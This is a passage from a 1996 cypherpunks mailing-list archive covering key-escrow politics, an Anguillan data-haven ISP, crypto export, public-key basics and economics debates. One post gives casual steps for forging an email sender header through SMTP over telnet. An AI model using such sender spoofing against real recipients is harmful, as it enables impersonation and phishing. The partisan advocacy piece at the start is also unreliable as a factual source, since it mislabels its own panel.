     Yet, Attorney General Janet Reno, FBI Director Louis Freeh, and
     Vice President Al Gore are all demanding the authority to read our
     encrypted messages. In a speech to the Commonwealth Club of
     California, Reno bluntly stated her demand for "ensuring law
     enforcement access to encrypted data.''

     Reno boasted that there is "a consensus'' that the government
     should create a system known as "Key Escrow'' (i.e., a supposedly
     "neutral third party''), to which all Americans should be forced
     to "entrust'' the keys to their encrypted messages, and to which
     the government would have access. On the contrary, there is no
     such consensus.

     Do you trust Janet Reno with access to your private messages? Do
     you trust the FBI to keep your files confidential?

     The Clinton Administration is already doing 30 to 40 percent more
     federal telephone wiretaps and other electronic surveillance than
     the last year of the Bush Administration. Those figures don't even
     include national security wiretaps or the hundreds of extensions
     granting more time for wiretap orders already issued.

     FBI Director Freeh wrote the New York Times last November that
     "There is no intention to expand the number of wiretaps or the
     extent of wiretapping." Four months later, FBI documents revealed
     that the FBI does, in fact, plan to increase electronic
     surveillance 54 percent by 1998 and 130 percent by 2004.

     On July 12, Al Gore announced that the Administration will
     continue to push for the adoption of a massive public key
     infrastructure to give the government access to all encrypted
     communications. In a blatant bid for a police-state surveillance
     society, Gore warned about "the dangers of unregulated encryption
     technology."

     A neutral panel of the National Research Council was set up to
     make policy recommendations about encryption. The panel called on
     the government to abandon its efforts to restrict encryption.

     The NSC panel concluded that increased use of encryption would
     enhance our national security, not diminish it. Thirteen out of
     its 16 members had security clearances with access to secret
     information, and they saw no national security reason to justify
     the Clinton policy.

     The Clinton Administration bases its campaign to control private
     encryption on the alleged need to fight crime through wiretapping.
     However, the NSC panel concluded that the ability of the private
     sector to transfer confidential financial and other data over the
     information highway without interception is far more important.

     New technologies have given government awesome power to spy on
     individuals. The Filegate investigation accidentally uncovered the
     shocking news that, as soon as Bill Clinton entered the White
     House in 1993, he secretly spent $400,000 on software to create a
     highly sophisticated computer database to track detailed
     political, financial, attitudinal, and personal biographical
     information on 200,000 people, including members of Congress and
     the media. Known as WHODB for White House Office Data Base, the
     system was nicknamed Big Brother.

     Encryption is a First Amendment issue, not a crime issue. If the
     Clinton Administration is allowed to control encryption, it would
     be the biggest expansion of federal power since the passage of the
     Income Tax Amendment in 1913.


EAGLE FORUM -- eagle@eagleforum.org
PO Box 618
Alton, IL  62002
Phone: 618-462-5415
 ----------------------------------------------
Are you on our E-mail list?

Tell a friend about us!

http://www.eagleforum.org





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Wed, 14 Aug 1996 23:08:00 +0800
To: cypherpunks@toad.com
Subject: Anguilla - legal action or lack thereof
In-Reply-To: <Pine.LNX.3.91.960814072543.12056A-100000@offshore>
Message-ID: <Pine.LNX.3.91.960814075142.12075B-100000@offshore>
MIME-Version: 1.0
Content-Type: text/plain



Dr.Dimitri Vulis KOTM <dlv@bwalk.dm.com>
> 
> "Greg Kucharo" <sophi@best.com> writes:
> >   While Tim may be right that nobility is lost when backing down to the
> > authorities, the fact is that this game has little to do with noble
> > purposes. ...
> 
> Nor was there any activity from the authorities.

There were activity from the authorities.  They had copies of the article
and were very concerned about it and calling around asking people who knew
me about this.  They have not started any legal action about this. 
However, my work permit is up for renewal.  They would not ever have to
take legal action to shut me down, just decide not to renew my work
permit, and I would have to leave the island. 

My lawyer says it is illegal to sell fake passports in Anguilla. So
defending this guy could easily have been a fight to my death as an
Anguilla ISP.  Not defending him means he relocates to another ISP. This
is the Internet guys, relocating a domain is not such a big deal. 
Taxbomber is using it as a reason for publicity, but he lost no email and
his web pages were not down long.  Remember regulatory arbitrage.  If one
country does not want something, there are other countries. 

I am going to apply for a 3 year work permit next time (they only gave out
1 year ones till very recently - since I applied).  Assuming I get this,
I will be in a somewhat more secure position.

   --  Vince

-----------------------------------------------------------------------
Vincent Cate   vince@offshore.com.ai  http://www.offshore.com.ai/vince/
Offshore Information Services         http://www.offshore.com.ai/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Wed, 14 Aug 1996 23:48:40 +0800
To: cypherpunks@toad.com
Subject: Anguilla - A DataHaven?
In-Reply-To: <Pine.LNX.3.91.960814080828.12056B-100000@offshore>
Message-ID: <Pine.LNX.3.91.960814081442.12075C-100000@offshore>
MIME-Version: 1.0
Content-Type: text/plain



Tim:
> Rather, there is an "archetype," if you will, of what a "remailer" is, what
> a "data haven" is, what a "tax shelter" is, etc. While we cannot reasonably
> expect a remailer to exactly match the archetype, we can point out obvious
> deficiencies.

1)  Anguilla has secrecy laws.  Professional relationships are confidential.
    There are strong secrecy laws.  I have not given out taxbomber's
    name, nor will I as I could face legal action if I did.

2)  Anguilla has no sales or income taxes.  A business does not need to
    report anything about income, sales, etc, to the government (or anyone
    else).  If a guy wants to sell his data and keep 100% of the profits
    instead of 50% or 60%, then Anguilla would be a haven for him.

3)  We don't have the same laws as other countries, so there are things
    that can be done here.  For example, we can export encryption 
    software.  Also, we will have bingo.com in Anguilla.

There are deficiencies from a cypherpunk or Libertarian point of view. And
these are interesting.  And exactly what I want to do is changing. As I
said, Anguilla is not the datahaven of cypherpunks wet dreams.  I am sure
there are no datahavens that match the cypherpunk concept of an ideal
datahaven, yet. 

But I think the term DataHaven applies as well to Anguilla as any other
place I know of.  

Tim, we would all be very happy if you were to locate a country that could
be the site of the ideal datahaven, and finance a couple cypherpunks to
setup there.  It would be a big help to our cause.  Could you do this? 

In the mean time, people may have to exist in cyberspace (like
www.taxbomber.com) without having a totally secure physical location. 
This is not the end of the world, or really even that painful.  If done
right you could be down for only an hour - just long enough for
nameservers to change.  Taxbomber is now setup to do it very fast next
time, if the need ever comes.  Tim, I think you have even advocated this
approach, not stressing the physical location, just the cyberspace
location.  No? 

   --  Vince

-----------------------------------------------------------------------
Vincent Cate   vince@offshore.com.ai  http://www.offshore.com.ai/vince/
Offshore Information Services         http://www.offshore.com.ai/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike van der Merwe <mikev@is.co.za>
Date: Wed, 14 Aug 1996 17:18:44 +0800
To: cypherpunks@toad.com
Subject: Re: Changing the headers
In-Reply-To: <009A6D03.6A10B362.18@uni-lj.si>
Message-ID: <32117D4F.59E2B600@is.co.za>
MIME-Version: 1.0
Content-Type: text/plain


Hi again :-)

Changing the from header is easy -- load netscape and change your from
addy... 

Or else you can telnet to port 25 of any given smtp server and type help
-- the rest is great fun. If memory serves, type HELO (one "l") to
introduce yourself, then declare the recipient and the sender and
finally any headers and the message. But type help -- smtp servers are
very friendly.

Later
Mike

-- 
I'm sure we will find out in a few years that Microsoft invented the
Net.  Or brought it to the masses.  Or saved it from a certain and
early demise.  Or all of the above. 
     JAMES SEYMOUR


http://titus.is.co.za/mikev




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bjorn E. Andersson" <bea@algonet.se>
Date: Wed, 14 Aug 1996 19:02:44 +0800
To: <nor@algonet.se>
Subject: Re: PGP...
Message-ID: <v03007803ae37330e4634@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP MESSAGE-----
Version: 2.6.3ia
Comment: Processed by MacPGP Control

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
mUA=
=Um3c
-----END PGP MESSAGE-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben <ben@EdelWeb.fr>
Date: Wed, 14 Aug 1996 19:34:38 +0800
To: cypherpunks@toad.com
Subject: Re: South Florida Cypherpunks Meeting Reminder
In-Reply-To: <199608132238.SAA52914@osceola.gate.net>
Message-ID: <Pine.SUN.3.95.960814104551.4380C-100000@mercier.gctech.edelweb.fr>
MIME-Version: 1.0
Content-Type: text/plain


> The South Florida Cypherpunks will meet at Hops Grill & Bar
> in Boynton Beach, FL on Saturday, August 17 at 2:00 PM.  As
> always, our meeting place is at a microbrewery, and this one
> has some very fine brews.

Is there anyone who would be interested in a Paris(France) cpunks meeting?

Ben.
____
Ben Samman.................................................ben@edelweb.fr
Paris, France                      Illudium Q36 Explosive Space Modulator






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Wed, 14 Aug 1996 20:06:33 +0800
To: Frank Stuart <fstuart@vetmed.auburn.edu>
Subject: Re: [SIGNAL] Microsoft's Internet Explorer
In-Reply-To: <199608140728.CAA20496@snoopy.vetmed.auburn.edu>
Message-ID: <Pine.GSO.3.93.960814121701.27605D-100000@nebula.online.ee>
MIME-Version: 1.0
Content-Type: text/plain


 Wed, 14 Aug 1996, Frank Stuart kirjutas:

> According to C-Net Radio (http://www.cnet.com/), Microsoft will be including
> 128-bit SSL encryption in their Internet Explorer 3.0 for Win 95 and NT 4.0.

As M$IE 3.0 is now available for download from www.microsoft.com, I did
notice there is also a 128-bit version there, which requires you to first
fill in data about you. Unfortunately microsoft.com is so slow right now,
that I did not have a chance to try to download 128-bit version by filling
in my favourite US politicians name. 

I believe the 128-bit M$IE 3.0 should be allowed to stored on some
european crypto sites like hacktic, as it is free to everyone - with
Netscape Navigator you would be breaking the copyright, with M$IE only
ITAR.

Jüri Kaljundi
AS Stallion
jk@stallion.ee





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bjorn E. Andersson" <bea@algonet.se>
Date: Wed, 14 Aug 1996 23:00:12 +0800
To: cypherpunks@toad.com
Subject: Re- PGP
Message-ID: <v03007801ae376b562c80@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


Sorry for the noise, I did a Cc by mistake.

Bjorn A.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Wed, 14 Aug 1996 23:29:20 +0800
To: "'cypherpunks@toad.com>
Subject: Re: National Socio-Economic Security Need for Encr
Message-ID: <01BB89EA.DA36D600@groningen08.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain



Chris Adams wrote:

>On 12 Aug 96 19:17:00 -0800, bart.croughs@tip.nl wrote:

>Now I will explain why the austrian economists are right.
Imagine Robinson Crusoe. In the beginning, he catches fish with his bare hands. He has no capital investment, and consequently he is not very productive. His wage will be low (he will not catch much fish). If there is more capital investment - if, for example, he has a fishing rod - he will catch more fish in less time. His productivity is higher. His wage is higher (more fish). If there is still more capital investment - if, for example, he has a boat and fishing nets - he will catch even more fish. His productivity is higher. His wage is higher. Etcetera. So, it's really not difficult to see that the Robin's standard of living depends on the amount of capital available on his island. The same goes for the rest of humanity.<


To a limited extent, that holds water.  However, how would you explain,
say, some of the construction work around here where a huge, expensive
piece of equipment is being run by some guy making less than the Cal
Trans worker with the flags?  Or guys I know who are making low-middle
class wages working on a $10,000 computer hooked up to a $1,500,000+
molding machine?  Also: lawyers -  You're getting charged $200 a billing
hour by someone who probably doesn't even use a typewriter (After all,
secretaries aren't just for oggling).  Although legal references might be
somewhat expensive, it doesn't compare to the money gained.
Also: computers.  I know people who are making an incredible amount on
old machines.  They might be using a few dollars in software (probably
2-3 hours worth at most)  and are working on a cheesy old machine. 
However, because some of these $6.25/hr typists have been putting useful
information into it, it is worth the trouble to pay someone $50/hr to fix
it.  Neither of them has invested much compared to what they're getting
in return.<

When economists say that wages depend on the amount of capital invested, 
they mean on a regional/national level, not on the level of individuals.

>Your argument only works with 2 givens: 1) A larger investment will
return at least a corresponding increase in productivity.<

This tends to be the case. If a larger investment doesn't return a corresponding
 increase in productivity, the investment will generally not be made. Happily, no
 one wants to waste his money on investments that are not productive. 

>and 2) the worker is self-employed - otherwise there are too many factors involved.
If #1 is true, *someone* will be making more money, but not necessarily
the worker.<

Yes, it's the worker who will make more money. Why? As I explained in
 another post on this subject:

"Increased productivity of workers leads to higher wages for workers because
of competition between employers. If a worker produces the worth of $3000 
per month for his employer, and his employer is only willing to give him a wage of $2000 , then there are other employers who would be happy to give this man
a job at a higher wage. They still profit if they give him a wage of $2100 
instead of $2000. This process goes on until the salary of the worker equals 
his marginal productivity."

Bart Croughs








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Wed, 14 Aug 1996 23:16:12 +0800
To: "'cypherpunks@toad.com>
Subject: Re: National Socio-Economic Security Need for Encryption  Technology
Message-ID: <01BB89EA.F3642600@groningen08.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain


Arun Mehta wrote:

>>Bart  Croughs wrote:
>I don't assume that the *total amount* of capital will be
lowered in the US when US capital moves abroad. I assume that the
amount of capital in the US will be *relatively lower*. So the
wages will be *relatively* lower (lower than when the capital
wouldn't have left the US), but not necessarily lower in any
absolute sense. I thought this was obvious, but since Arun Mehta
also misunderstood me, maybe I should have been more explicit here.

>	Henry Hazlitt in 'economics in one lesson' (p. 139): "The best
way to raise wages, therefore, is to raise marginal labor
productivity. This can be done by many methods: by an increase in
capital accumulation - i.e. by an increase in the machines with
which the workers are aided..."

Pardon me, but I'm still confused. When Hazlitt talks about how
many machines are employed, surely that's "absolute" capital, not
relative. If US capital is invested abroad sensibly, such that it
enriches the investors, they have more money to invest in
machines at home and thereby increase local productivity (and wages). <<

If investors use their capital to invest abroad, this capital cannot at the same
 time be used to invest at home. Only after the investors decide not to invest
 abroad any more, they can invest it at home. But I was not talking about
 investors who decide to stop investing abroad and start investing at home. I
 was talking about investors who decide to invest abroad instead of at home,
 and the effect of such a decision on the wages in the US. Maybe in the future
 these investors will have more money, and will decide to stop investing abroad
 and start investing at home. But in the mean time, all the capital that's
 invested abroad diminishes the amount of capital invested at home, and so
 causes the wages at home to be less than they otherwise would have been
 (but not necessarily less in any absolute sense).

Bart Croughs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Wed, 14 Aug 1996 23:10:35 +0800
To: "'cypherpunks@toad.com>
Subject: Re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <01BB89EA.F7C73200@groningen08.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain



Joel Morgan wrote:

>It seems clear that capital investment in tools will contribute to the
-productivity- of workers.  (Tools here meaning whatever machinery/
infrastructure is used to get work done.)

Bart Croughs quotes a number of economists who seem to be saying that
when capital investment leads to increased productivity (per worker)
this also leads to higher wages.

I'm not sure I understand -why- this should necessarily be so.  It's my
impression that in manufacturing industries, the more mechanized
production is, the more workers will get paid.  Then again, perhaps a
more mechanized industry will pay more because more mechanized
industries hire workers with higher skills (albeit fewer workers).

It's my impression that when a company makes capital investments which
increase productivity, the fruits of this increased worker productivity
are shared (to some extent) with the workers.  I can imagine a number of
reasons why this might be done, but it's not absolutely clear to me
that this would be a direct result of market forces.<

Increased productivity of workers leads to higher wages for workers because
of competition between employers. If a worker produces the worth of $3000 
per month for his boss, and his boss is only willing to give him $2000 
salary, then there are other employers who would be happy to give this man
a job at a higher wage. They still profit if they give him a wage of $2100 
instead of $2000. This process goes on until the salary of the worker equals 
his marginal productivity.

Bart Croughs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Wed, 14 Aug 1996 23:31:59 +0800
To: "'cypherpunks@toad.com>
Subject: Re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <01BB89EA.FB826540@groningen08.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain


Blanc Weber wrote:

>>From: 	Bart  Croughs
>
>You haven't answered this question yet. I don't claim that the U.S. is worse
>off when US capital moves abroad. I only ask: how can you proof that the US
>isn't worse off when US capital moves abroad? 
.............................................................


You have to be able to imagine the advantages, and you can only imagine
them when you have the background to understand the difference between
having fewer choices rather than more, a limited market base rather than
an open one full of unlimited opportunity, and the increased domestic
tensions from frustrated consumers who are likely to set up blackmarkets
as work-arounds to the lack of desired goods & services. 

Essentially, you have to want to see, and work for, the difference
resulting from unprotected markets.   I think people who put up a lot of
objections are afraid and do not want any proof of their error.   You'd
have to hold their nose to the figures, and even then they might close
their eyes....<

You are wrong. I'm not in error; I don't think the US is worse off when US
 capital moves abroad. I just want to know how you can proof it, so I would be
 able to rebut protectionist arguments. I don't know how to prove it. And, 
unfortunately, neither do you. Rhetoric is no proof.

 Bart Croughs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Wed, 14 Aug 1996 17:55:33 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: India, Productivity, and Tropical Climes
In-Reply-To: <199608140439.VAA28846@dns2.noc.best.net>
Message-ID: <Pine.WNT.3.95.960814145122.-981433H-100000@stanley.ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 13 Aug 1996, James A. Donald wrote:

> At 11:31 PM 8/13/96 +0600, Arun Mehta wrote:
> > As regards IBM, its agreement with the government of India, under
> > which it was allowed to operate in the country, stipulated that
> > it would produce here, and transfer some technology. Instead, as
> > the government found, all it did was sell time on second-hand
> > computers (1401's as I recall, and this was mid  to late '70s).
> > IBM was asked to either dilute, or live up to its original
> > agreement, which it wasn't prepared to do, so it left.
> 
> Every single foreign computer company left during roughly the same 
> period, as did almost all foreign companies and anybody who had a choice.
> 
> The reasons generally given by those who left, for this mass exodus, 
> which eventually sent the government into insolvency, is that Indian 
> officials were arrogant, rude, dishonest, corrupt, continually broke 
> contracts and agreements, and attempted to exercise direct power over 
> everyone and everything.

Not only: until at least five or six years ago, the trade unions had
forced limits to the yearly increase in number of computers per year in
the banking sector (if I remember well, 2% a year for private institutions
and 1% for government owned). The government duly obliged, of course.

Tropical climate or "corporate greed" has nothing to do with inefficiency
and poverty: just compare the cases of Hong Kong or Singapore.
Rather, corrupt and populistic governments are the key factor.

Enzo





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ariel@compcurr.com
Date: Thu, 15 Aug 1996 10:00:57 +0800
To: maillist@mail.compcurr.com
Subject: Inside Currents Vol.1,No.5
Message-ID: <199608131847.LAA01140@mail.compcurr.com>
MIME-Version: 1.0
Content-Type: text/plain


*******************************************************
Inside Currents
Vol 1, No. 5
August 13, 1996

Inside Currents Newsletter
An electronic update from Computer Currents Interactive
http://www.currents.net

*******************************************************
CONTENTS:

1. Tech Support, on and off line:  This week's cover story in Computer
Currents Magazine
http://www.currents.net/covr

2.  Gigglebytes turns 10!
http://www.currents.net/gigg

3. Check out our online Shopping Mall
http://www.currents.net/mall

4. Computer Catalogs Online
http://www.currents.net/catalogs

5. Coming soon, from Computer Currents Interactive

6.  Computer Currents Interactive membership information
http://www.currents.net/members

*****************************************************
1. Tech Support, on and off line:  
Do you need help navigating the sea of available tech support resources?
Read our exclusive Computer Currents cover story for information about 
third
party software and hardware support companies who sell phone support, plus
fee and free online help you can find on the internet.  Also, new in our
Columns section: "Corporate PC" looks at Post-It Software Notes; "Gizmos"
explores the chaotic world of videoconferencing; Net Surfer tries Offline
Web Browsing. 

       http://www.currents.net/covr


2. Gigglebytes turns 10!
This month Computer Currents magazine celebrates the 10th anniversary of
Gigglebytes. 
Join author Lincoln Spector as he revisits his favorite articles over the 
past
decade.  Gigglebytes gives readers a humorous view on computer industry 
events,
trends and people.  

       http://www.currents.net/gigg

3. Check out our online Shopping Mall
Our new shopping mall area is still under construction, but we're already
bringing together an exciting range of regionally based goods and 
services.
Of special note: Our Net Quote service allows you to solicit price bids on
computer equipment--you can let the stores come to you.

        http://www.currents.net/mall


4. Computer Catalogs Online
If you're thinking of buying a new computer, check out the new section 
we've
got up and running!  Now our users can research computer stores in
their area (or mail order), and browse available hardware listings.  You 
can
find local contact numbers with just the click of a mouse!

        http://www.currents.net/catalogs

5. Coming soon, from Computer Currents Interactive
Discount coupons you can print out and use with local retailers;
more ways to order online through CCI; our enhanced "Computer Advisor" 
section;
stimulating chat rooms and forums; contests and surveys; more FREE stuff.


6. Computer Currents Interactive membership
CCI Membership is FREE and benefits abound! Create and edit your own 
Gallery
page,
post your resume in our Talent Bank, receive special product discounts 
from
CCI vendors,
participate in contests and surveys, and much more! If you're not already 
a
member, join CCI today.

       http://www.currents.net/members

*****************************************************
How to subscribe to Inside Currents:

To Subscribe:
1. Join CCI at https://www.currents.net/members
2. Check yes to "subscribe to Inside Currents" box.

To Unsubscribe:

 1. If you are NOT interested in receiving Inside Currents, cut and paste
this sentence and e-mail us at
caliban@compcurr.com. We'll remove your address from our list. Please be
sure to include your user name.

2. If you need further assistance, please send e-mail to 
ariel@compcurr.com


*******************************************************
Computer Currents Interactive   http://www.currents.net
The full-service online resource for computer users!
*******************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Crocker <dcrocker@brandenburg.com>
Date: Thu, 15 Aug 1996 01:40:24 +0800
To: Mike van der Merwe <mikev@is.co.za>
Subject: Re: PGP...
In-Reply-To: <009A6C9C.E823907E.18@uni-lj.si>
Message-ID: <v03007800ae3784a734eb@[205.214.160.100]>
MIME-Version: 1.0
Content-Type: text/plain


Responses you've gotten have foccussed on defining public versus private
key.  Some have cited how they are used, but I'd like to emphasize this:

Message authentication:

  Make a "hash" of the message, i.e., compute a short, unique tag of the
message.  (A common algorithm for this is MD5.)  Then "encrypt" the hash
using the SENDER's private key.  Anyone wishing to authenticate the message
uses the SENDER's public key to "decrypt" the hash and check it against the
message receive (i.e., recompute a new hash and compare it to the received
one.)


Message privacy:

  Encrypt the message data.  (A common algorithm is DES or, more recently,
triple DES.  PGP uses IDEA.)  To get acceptable performance, encryption is
done using a symmetric key algorithm, rather than a much slower asymmetric
(public) key algorithm.  Then "encrypt" the symmetric key using the
RECEIVER's public key.  The RECEIVER uses their private key to decrypt the
symmetric key and then uses the symmetric key to decrypt the data.


	Note that these two different functions use private keys in an
essential opposite manner, or reverse relationship.

d/


--------------------
Dave Crocker                                            +1 408 246 8253
Brandenburg Consulting                             fax: +1 408 249 6205
675 Spruce Dr.                                 dcrocker@brandenburg.com
Sunnyvale CA 94086 USA                       http://www.brandenburg.com

Internet Mail Consortium               http://www.imc.org, info@imc.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 15 Aug 1996 02:38:59 +0800
To: Brad Dolan <tcmay@got.net>
Subject: Re: Capital and Taxes
Message-ID: <199608141511.IAA27228@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:01 AM 8/14/96 -0400, Brad Dolan wrote:
>On Tue, 13 Aug 1996, Timothy C. May wrote:

>> Yes, taxes will _someday_ have to be paid...but many of us are hoping,
>> praying, and pleading for a cut in the capital gains tax rate...at least a
>> rollback to the 22% rate of yesteryear (and 4% or less in states). This
>> huge "backlog" of unrealized capital gains (aka gains on paper, but not yet
>> taxable) is what is being spoken of when people like Jack Kemp and Steve
>> Forbes speak of "unleashing" the capital gains now tied up due to the high
>> tax rates.
>
>
>Now imagine that I want to make that $100K investment or, more 
>realistically, that I want to invest $100K in my kid's college education.
>I'm going to have to earn wages of $160K and pay $60K in tax.  It would 
>make me cranky if the guy next door could just clip $100K of coupons, tax 
>free, to pay for his kid's education.
>
>While I'm sure Steve Forbes could, I can't think of a moral argument why 
>income from selling stock should be taxed at a rate lower (or higher) than 
>than income from wages.

Perhaps you've forgotten double-taxation.  When a company makes a profit, it 
is taxed at the full corporate tax rate.  Paid to a stockholder, it is AGAIN 
taxed at the citizen's rate.  It's a ripoff, and the strange thing is a lot 
of citizen-dolts don't understand this or understand its implications.

It would be fairer to tax either once the corporation, or the individual, 
but not both.  Now, capital gains is merely the effect of increased value 
that hasn't yet been paid in dividend.  It would make sense, therefore, to 
simply not tax "income from selling stock" since the taxes have already been 
paid.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Firebeard <stend@grendel.austin.texas.net>
Date: Thu, 15 Aug 1996 00:58:05 +0800
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: Capital and Taxes
In-Reply-To: <ae36838e05021004b025@[205.199.118.202]>
Message-ID: <199608141319.IAA23659@grendel.austin.texas.net>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> Brad Dolan writes:

BD> Now imagine that I want to make that $100K investment or, more
BD> realistically, that I want to invest $100K in my kid's college
BD> education.  I'm going to have to earn wages of $160K and pay $60K
BD> in tax.  It would make me cranky if the guy next door could just
